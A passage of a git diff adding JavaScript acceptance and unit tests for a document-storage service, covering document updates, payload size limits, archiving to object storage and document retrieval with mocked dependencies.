{ + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + null, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + }) + + describe('when no version is provided', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + null, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + return done() + } + ) + }) + }) + + describe('when the content is large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1mb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.largeLines) + return done() + } + ) + }) + }) + + describe('when there is a large json payload', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1kb + this.originalRanges.padding = Array.apply(null, Array(2049)).map( + () => line + ) // 2mb + 1kb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.largeLines) + return done() + } + ) + }) + }) + + describe('when the document body is too large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(2049)).map(() => line) // 2mb + 1kb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 413', function () { + return this.res.statusCode.should.equal(413) + }) + + it('should report body too large', function () { + return this.res.body.should.equal('document body too large') + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + + return describe('when the json payload is too large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1kb + this.originalRanges.padding = Array.apply(null, Array(6144)).map( + () => line + ) // 6mb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/helpers/DocstoreApp.js b/services/docstore/test/acceptance/js/helpers/DocstoreApp.js new file mode 100644 index 0000000..5e837b1 --- /dev/null +++ b/services/docstore/test/acceptance/js/helpers/DocstoreApp.js @@ -0,0 +1,26 @@ +const app = require('../../../../app') +const settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } + this.initing = true + this.callbacks.push(callback) + app.listen(settings.internal.docstore.port, '127.0.0.1', error => { + if (error != null) { + throw error + } + this.running = true + for (callback of Array.from(this.callbacks)) { + callback() + } + }) + }, +} diff --git a/services/docstore/test/acceptance/js/helpers/DocstoreClient.js b/services/docstore/test/acceptance/js/helpers/DocstoreClient.js new file mode 100644 index 0000000..790ec8f --- /dev/null +++ b/services/docstore/test/acceptance/js/helpers/DocstoreClient.js @@ -0,0 +1,195 @@ +let DocstoreClient +const request = require('request').defaults({ jar: false }) +const settings = require('@overleaf/settings') +const Persistor = require('../../../../app/js/PersistorManager') + +async function streamToString(stream) { + const chunks = [] + return await new Promise((resolve, reject) => { + stream.on('data', chunk => chunks.push(chunk)) + stream.on('error', reject) + stream.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) + }) +} + +async function getStringFromPersistor(persistor, bucket, key) { + const stream = await persistor.getObjectStream(bucket, key, {}) + stream.resume() + return await streamToString(stream) +} + +module.exports = DocstoreClient = { + createDoc(projectId, docId, lines, version, ranges, callback) { + return DocstoreClient.updateDoc( + projectId, + docId, + lines, + version, + ranges, + callback + ) + }, + + getDoc(projectId, docId, qs, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`, + json: true, + qs, + }, + callback + ) + }, + + peekDoc(projectId, docId, qs, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/peek`, + json: true, + qs, + }, + callback + ) + }, + + isDocDeleted(projectId, docId, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/deleted`, + json: true, + }, + callback + ) + }, + + getAllDocs(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc`, + json: true, + }, + (req, res, body) => { + callback(req, res, body) + } + ) + }, + + getAllDeletedDocs(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc-deleted`, + json: true, + }, + (error, res, body) => { + if (error) return callback(error) + if (res.statusCode !== 200) { + return callback(new Error('unexpected statusCode')) + } + callback(null, body) + } + ) + }, + + getAllRanges(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/ranges`, + json: true, + }, + callback + ) + }, + + updateDoc(projectId, docId, lines, version, ranges, callback) { + return request.post( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`, + json: { + lines, + version, + ranges, + }, + }, + callback + ) + }, + + deleteDoc(projectId, docId, callback) { + DocstoreClient.deleteDocWithDateAndName( + projectId, + docId, + new Date(), + 'main.tex', + callback + ) + }, + + deleteDocWithDate(projectId, docId, date, callback) { + DocstoreClient.deleteDocWithDateAndName( + projectId, + docId, + date, + 'main.tex', + callback + ) + }, + + deleteDocWithName(projectId, docId, name, callback) { + DocstoreClient.deleteDocWithDateAndName( + projectId, + docId, + new Date(), + name, + callback + ) + }, + + deleteDocWithDateAndName(projectId, docId, deletedAt, name, callback) { + request.patch( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`, + json: { name, deleted: true, deletedAt }, + }, + callback + ) + }, + + archiveAllDoc(projectId, callback) { + request.post( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/archive`, + }, + callback + ) + }, + + archiveDoc(projectId, docId, callback) { + request.post( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/archive`, + }, + callback + ) + }, + + destroyAllDoc(projectId, callback) { + request.post( + { + url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/destroy`, + }, + callback + ) + }, + + getS3Doc(projectId, docId, callback) { + getStringFromPersistor( + Persistor, + settings.docstore.bucket, + `${projectId}/${docId}` + ) + .then(data => { + callback(null, JSON.parse(data)) + }) + .catch(callback) + }, +} diff --git a/services/docstore/test/setup.js b/services/docstore/test/setup.js new file mode 100644 index 0000000..92b86c9 --- /dev/null +++ b/services/docstore/test/setup.js @@ -0,0 +1,55 @@ +const chai = require('chai') +const sinon = require('sinon') +const sinonChai = require('sinon-chai') +const chaiAsPromised = require('chai-as-promised') +const SandboxedModule = require('sandboxed-module') +const timersPromises = require('node:timers/promises') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb-legacy').ObjectId.cacheHexString = true + +process.env.BACKEND = 'gcs' + +// Chai configuration +chai.should() +chai.use(sinonChai) +chai.use(chaiAsPromised) + +// Global stubs +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + fatal: sandbox.stub(), + }, +} + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + 'timers/promises': timersPromises, + 'mongodb-legacy': require('mongodb-legacy'), + }, + globals: { Buffer, JSON, Math, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/docstore/test/unit/js/DocArchiveManagerTests.js b/services/docstore/test/unit/js/DocArchiveManagerTests.js new file mode 100644 index 0000000..a57f980 --- /dev/null +++ b/services/docstore/test/unit/js/DocArchiveManagerTests.js @@ -0,0 +1,580 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../app/js/DocArchiveManager.js' +const SandboxedModule = require('sandboxed-module') +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') +const StreamToBuffer = require('../../../app/js/StreamToBuffer').promises + +describe('DocArchiveManager', function () { + let DocArchiveManager, + PersistorManager, + MongoManager, + RangeManager, + Settings, + Crypto, + StreamUtils, + HashDigest, + HashUpdate, + archivedDocs, + mongoDocs, + archivedDoc, + archivedDocJson, + md5Sum, + projectId, + readStream, + stream, + streamToBuffer + + beforeEach(function () { + md5Sum = 'decafbad' + + RangeManager = { + jsonRangesToMongo: sinon.stub().returns({ mongo: 'ranges' }), + } + Settings = { + docstore: { + backend: 'gcs', + bucket: 'wombat', + }, + parallelArchiveJobs: 3, + } + HashDigest = sinon.stub().returns(md5Sum) + HashUpdate = sinon.stub().returns({ digest: HashDigest }) + Crypto = { + createHash: sinon.stub().returns({ update: HashUpdate }), + } + StreamUtils = { + ReadableString: sinon.stub().returns({ stream: 'readStream' }), + } + + projectId = new ObjectId() + archivedDocs = [ + { + _id: new ObjectId(), + inS3: true, + rev: 2, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 4, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + ] + mongoDocs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + rev: 4, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + { + _id: new ObjectId(), + lines: ['111', '222', '333'], + rev: 6, + }, + ] + + archivedDoc = { + lines: mongoDocs[0].lines, + rev: mongoDocs[0].rev, + } + + archivedDocJson = JSON.stringify({ ...archivedDoc, schema_v: 1 }) + + stream = { + on: sinon.stub(), + resume: sinon.stub(), + } + stream.on.withArgs('data').yields(Buffer.from(archivedDocJson, 'utf8')) + stream.on.withArgs('end').yields() + + readStream = { + stream: 'readStream', + } + + PersistorManager = { + getObjectStream: sinon.stub().resolves(stream), + sendStream: sinon.stub().resolves(), + getObjectMd5Hash: sinon.stub().resolves(md5Sum), + deleteObject: sinon.stub().resolves(), + deleteDirectory: sinon.stub().resolves(), + } + + const getNonArchivedProjectDocIds = sinon.stub() + getNonArchivedProjectDocIds + .onCall(0) + .resolves(mongoDocs.filter(doc => !doc.inS3).map(doc => doc._id)) + getNonArchivedProjectDocIds.onCall(1).resolves([]) + + const getArchivedProjectDocs = sinon.stub() + getArchivedProjectDocs.onCall(0).resolves(archivedDocs) + getArchivedProjectDocs.onCall(1).resolves([]) + + const fakeGetDoc = async (_projectId, _docId) => { + if (_projectId.equals(projectId)) { + for (const mongoDoc of mongoDocs.concat(archivedDocs)) { + if (mongoDoc._id.equals(_docId)) { + return mongoDoc + } + } + } + throw new Errors.NotFoundError() + } + + MongoManager = { + promises: { + markDocAsArchived: sinon.stub().resolves(), + restoreArchivedDoc: sinon.stub().resolves(), + upsertIntoDocCollection: sinon.stub().resolves(), + getProjectsDocs: sinon.stub().resolves(mongoDocs), + getNonDeletedArchivedProjectDocs: getArchivedProjectDocs, + getNonArchivedProjectDocIds, + getArchivedProjectDocs, + findDoc: sinon.stub().callsFake(fakeGetDoc), + getDocForArchiving: sinon.stub().callsFake(fakeGetDoc), + destroyProject: sinon.stub().resolves(), + }, + } + + // Wrap streamToBuffer so that we can pass in something that it expects (in + // this case, a Promise) rather than a stubbed stream object + streamToBuffer = { + promises: { + streamToBuffer: async () => { + const inputStream = new Promise(resolve => { + stream.on('data', data => resolve(data)) + }) + + const value = await StreamToBuffer.streamToBuffer( + 'testProjectId', + 'testDocId', + inputStream + ) + + return value + }, + }, + } + + DocArchiveManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + crypto: Crypto, + '@overleaf/stream-utils': StreamUtils, + './MongoManager': MongoManager, + './RangeManager': RangeManager, + './PersistorManager': PersistorManager, + './Errors': Errors, + './StreamToBuffer': streamToBuffer, + }, + }) + }) + + describe('archiveDoc', function () { + it('should resolve when passed a valid document', async function () { + await expect( + DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + ).to.eventually.be.fulfilled + }) + + it('should throw an error if the doc has no lines', async function () { + const doc = mongoDocs[0] + doc.lines = null + + await expect( + DocArchiveManager.promises.archiveDoc(projectId, doc._id) + ).to.eventually.be.rejectedWith('doc has no lines') + }) + + it('should add the schema version', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[1]._id) + expect(StreamUtils.ReadableString).to.have.been.calledWith( + sinon.match(/"schema_v":1/) + ) + }) + + it('should calculate the hex md5 sum of the content', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(Crypto.createHash).to.have.been.calledWith('md5') + expect(HashUpdate).to.have.been.calledWith(archivedDocJson) + expect(HashDigest).to.have.been.calledWith('hex') + }) + + it('should pass the md5 hash to the object persistor for verification', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + + expect(PersistorManager.sendStream).to.have.been.calledWith( + sinon.match.any, + sinon.match.any, + sinon.match.any, + { sourceMd5: md5Sum } + ) + }) + + it('should pass the correct bucket and key to the persistor', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + + expect(PersistorManager.sendStream).to.have.been.calledWith( + Settings.docstore.bucket, + `${projectId}/${mongoDocs[0]._id}` + ) + }) + + it('should create a stream from the encoded json and send it', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(StreamUtils.ReadableString).to.have.been.calledWith( + archivedDocJson + ) + expect(PersistorManager.sendStream).to.have.been.calledWith( + sinon.match.any, + sinon.match.any, + readStream + ) + }) + + it('should mark the doc as archived', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[0]._id, + mongoDocs[0].rev + ) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getDocForArchiving).to.not.have.been.called + }) + }) + + describe('with null bytes in the result', function () { + const _stringify = JSON.stringify + + beforeEach(function () { + JSON.stringify = sinon.stub().returns('{"bad": "\u0000"}') + }) + + afterEach(function () { + JSON.stringify = _stringify + }) + + it('should return an error', async function () { + await expect( + DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + ).to.eventually.be.rejectedWith('null bytes detected') + }) + }) + }) + + describe('unarchiveDoc', function () { + let docId, lines, rev + + describe('when the doc is in S3', function () { + beforeEach(function () { + MongoManager.promises.findDoc = sinon + .stub() + .resolves({ inS3: true, rev }) + docId = mongoDocs[0]._id + lines = ['doc', 'lines'] + rev = 123 + }) + + it('should resolve when passed a valid document', async function () { + await expect(DocArchiveManager.promises.unarchiveDoc(projectId, docId)) + .to.eventually.be.fulfilled + }) + + it('should test md5 validity with the raw buffer', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(HashUpdate).to.have.been.calledWith( + sinon.match.instanceOf(Buffer) + ) + }) + + it('should throw an error if the md5 does not match', async function () { + PersistorManager.getObjectMd5Hash.resolves('badf00d') + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.be.instanceof(Errors.Md5MismatchError) + }) + + it('should restore the doc in Mongo', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, archivedDoc) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should error out on archived doc', async function () { + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.match( + /found archived doc, but archiving backend is not configured/ + ) + }) + + it('should return early on non-archived doc', async function () { + MongoManager.promises.findDoc = sinon.stub().resolves({ rev }) + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(PersistorManager.getObjectMd5Hash).to.not.have.been.called + }) + }) + + describe('doc contents', function () { + let archivedDoc + + describe('when the doc has the old schema', function () { + beforeEach(function () { + archivedDoc = lines + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return the docs lines', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev }) + }) + }) + + describe('with the new schema and ranges', function () { + beforeEach(function () { + archivedDoc = { + lines, + ranges: { json: 'ranges' }, + rev: 456, + schema_v: 1, + } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return the doc lines and ranges', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { + lines, + ranges: { mongo: 'ranges' }, + rev: 456, + }) + }) + }) + + describe('with the new schema and no ranges', function () { + beforeEach(function () { + archivedDoc = { lines, rev: 456, schema_v: 1 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return only the doc lines', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev: 456 }) + }) + }) + + describe('with the new schema and no rev', function () { + beforeEach(function () { + archivedDoc = { lines, schema_v: 1 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should use the rev obtained from Mongo', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev }) + }) + }) + + describe('with an unrecognised schema', function () { + beforeEach(function () { + archivedDoc = { lines, schema_v: 2 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should throw an error', async function () { + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejectedWith( + "I don't understand the doc format in s3" + ) + }) + }) + }) + }) + + it('should not do anything if the file is already unarchived', async function () { + MongoManager.promises.findDoc.resolves({ inS3: false }) + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(PersistorManager.getObjectStream).not.to.have.been.called + }) + + it('should throw an error if the file is not found', async function () { + PersistorManager.getObjectStream = sinon + .stub() + .rejects(new Errors.NotFoundError()) + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.be.instanceof(Errors.NotFoundError) + }) + }) + + describe('destroyProject', function () { + describe('when archiving is enabled', function () { + beforeEach(async function () { + await DocArchiveManager.promises.destroyProject(projectId) + }) + + it('should delete the project in Mongo', function () { + expect(MongoManager.promises.destroyProject).to.have.been.calledWith( + projectId + ) + }) + + it('should delete the project in the persistor', function () { + expect(PersistorManager.deleteDirectory).to.have.been.calledWith( + Settings.docstore.bucket, + projectId + ) + }) + }) + + describe('when archiving is disabled', function () { + beforeEach(async function () { + Settings.docstore.backend = '' + await DocArchiveManager.promises.destroyProject(projectId) + }) + + it('should delete the project in Mongo', function () { + expect(MongoManager.promises.destroyProject).to.have.been.calledWith( + projectId + ) + }) + + it('should not delete the project in the persistor', function () { + expect(PersistorManager.deleteDirectory).not.to.have.been.called + }) + }) + }) + + describe('archiveAllDocs', function () { + it('should resolve with valid arguments', async function () { + await expect(DocArchiveManager.promises.archiveAllDocs(projectId)).to + .eventually.be.fulfilled + }) + + it('should archive all project docs which are not in s3', async function () { + await DocArchiveManager.promises.archiveAllDocs(projectId) + // not inS3 + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[0]._id + ) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[1]._id + ) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[4]._id + ) + + // inS3 + expect( + MongoManager.promises.markDocAsArchived + ).not.to.have.been.calledWith(projectId, mongoDocs[2]._id) + expect( + MongoManager.promises.markDocAsArchived + ).not.to.have.been.calledWith(projectId, mongoDocs[3]._id) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getNonArchivedProjectDocIds).to.not.have + .been.called + }) + }) + }) + + describe('unArchiveAllDocs', function () { + it('should resolve with valid arguments', async function () { + await expect(DocArchiveManager.promises.unArchiveAllDocs(projectId)).to + .eventually.be.fulfilled + }) + + it('should unarchive all inS3 docs', async function () { + await DocArchiveManager.promises.unArchiveAllDocs(projectId) + + for (const doc of archivedDocs) { + expect(PersistorManager.getObjectStream).to.have.been.calledWith( + Settings.docstore.bucket, + `${projectId}/${doc._id}` + ) + } + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getNonDeletedArchivedProjectDocs).to.not + .have.been.called + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/DocManagerTests.js b/services/docstore/test/unit/js/DocManagerTests.js new file mode 100644 index 0000000..8405520 --- /dev/null +++ b/services/docstore/test/unit/js/DocManagerTests.js @@ -0,0 +1,755 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DocManager' +) +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') + +describe('DocManager', function () { + beforeEach(function () { + this.doc_id = new ObjectId().toString() + this.project_id = new ObjectId().toString() + this.another_project_id = new ObjectId().toString() + this.stubbedError = new Error('blew up') + this.version = 42 + + this.MongoManager = { + promises: { + findDoc: sinon.stub(), + getProjectsDocs: sinon.stub(), + patchDoc: sinon.stub().resolves(), + upsertIntoDocCollection: sinon.stub().resolves(), + }, + } + this.DocArchiveManager = { + promises: { + unarchiveDoc: sinon.stub(), + unArchiveAllDocs: sinon.stub(), + archiveDoc: sinon.stub().resolves(), + }, + } + this.RangeManager = { + jsonRangesToMongo(r) { + return r + }, + shouldUpdateRanges: sinon.stub().returns(false), + } + this.settings = { docstore: {} } + + this.DocManager = SandboxedModule.require(modulePath, { + requires: { + './MongoManager': this.MongoManager, + './DocArchiveManager': this.DocArchiveManager, + './RangeManager': this.RangeManager, + '@overleaf/settings': this.settings, + './Errors': Errors, + }, + }) + }) + + describe('getFullDoc', function () { + beforeEach(function () { + this.DocManager.promises._getDoc = sinon.stub() + this.doc = { + _id: this.doc_id, + lines: ['2134'], + } + }) + + it('should call get doc with a quick filter', async function () { + this.DocManager.promises._getDoc.resolves(this.doc) + const doc = await this.DocManager.promises.getFullDoc( + this.project_id, + this.doc_id + ) + doc.should.equal(this.doc) + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should return error when get doc errors', async function () { + this.DocManager.promises._getDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises.getFullDoc(this.project_id, this.doc_id) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('getRawDoc', function () { + beforeEach(function () { + this.DocManager.promises._getDoc = sinon.stub() + this.doc = { lines: ['2134'] } + }) + + it('should call get doc with a quick filter', async function () { + this.DocManager.promises._getDoc.resolves(this.doc) + const doc = await this.DocManager.promises.getDocLines( + this.project_id, + this.doc_id + ) + doc.should.equal(this.doc) + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + lines: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should return error when get doc errors', async function () { + this.DocManager.promises._getDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises.getDocLines(this.project_id, this.doc_id) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('getDoc', function () { + beforeEach(function () { + this.project = { name: 'mock-project' } + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + version: this.version, + } + }) + + describe('when using a filter', function () { + beforeEach(function () { + this.MongoManager.promises.findDoc.resolves(this.doc) + }) + + it('should error if inS3 is not set to true', async function () { + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + inS3: false, + }) + ).to.be.rejected + }) + + it('should always get inS3 even when no filter is passed', async function () { + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id) + ).to.be.rejected + this.MongoManager.promises.findDoc.called.should.equal(false) + }) + + it('should not error if inS3 is set to true', async function () { + await this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + inS3: true, + }) + }) + }) + + describe('when the doc is in the doc collection', function () { + beforeEach(async function () { + this.MongoManager.promises.findDoc.resolves(this.doc) + this.result = await this.DocManager.promises._getDoc( + this.project_id, + this.doc_id, + { version: true, inS3: true } + ) + }) + + it('should get the doc from the doc collection', function () { + this.MongoManager.promises.findDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the doc with the version', function () { + this.result.lines.should.equal(this.doc.lines) + this.result.version.should.equal(this.version) + }) + }) + + describe('when MongoManager.findDoc errors', function () { + it('should return the error', async function () { + this.MongoManager.promises.findDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + version: true, + inS3: true, + }) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('when the doc is archived', function () { + beforeEach(async function () { + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + version: 2, + inS3: true, + } + this.unarchivedDoc = { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + version: 2, + inS3: false, + } + this.MongoManager.promises.findDoc.resolves(this.doc) + this.DocArchiveManager.promises.unarchiveDoc.callsFake( + async (projectId, docId) => { + this.MongoManager.promises.findDoc.resolves({ + ...this.unarchivedDoc, + }) + } + ) + this.result = await this.DocManager.promises._getDoc( + this.project_id, + this.doc_id, + { + version: true, + inS3: true, + } + ) + }) + + it('should call the DocArchive to unarchive the doc', function () { + this.DocArchiveManager.promises.unarchiveDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should look up the doc twice', function () { + this.MongoManager.promises.findDoc.calledTwice.should.equal(true) + }) + + it('should return the doc', function () { + expect(this.result).to.deep.equal({ + ...this.unarchivedDoc, + }) + }) + }) + + describe('when the doc does not exist in the docs collection', function () { + it('should return a NotFoundError', async function () { + this.MongoManager.promises.findDoc.resolves(null) + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + version: true, + inS3: true, + }) + ).to.be.rejectedWith( + `No such doc: ${this.doc_id} in project ${this.project_id}` + ) + }) + }) + }) + + describe('getAllNonDeletedDocs', function () { + describe('when the project exists', function () { + beforeEach(async function () { + this.docs = [ + { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + }, + ] + this.MongoManager.promises.getProjectsDocs.resolves(this.docs) + this.DocArchiveManager.promises.unArchiveAllDocs.resolves(this.docs) + this.filter = { lines: true } + this.result = await this.DocManager.promises.getAllNonDeletedDocs( + this.project_id, + this.filter + ) + }) + + it('should get the project from the database', function () { + this.MongoManager.promises.getProjectsDocs.should.have.been.calledWith( + this.project_id, + 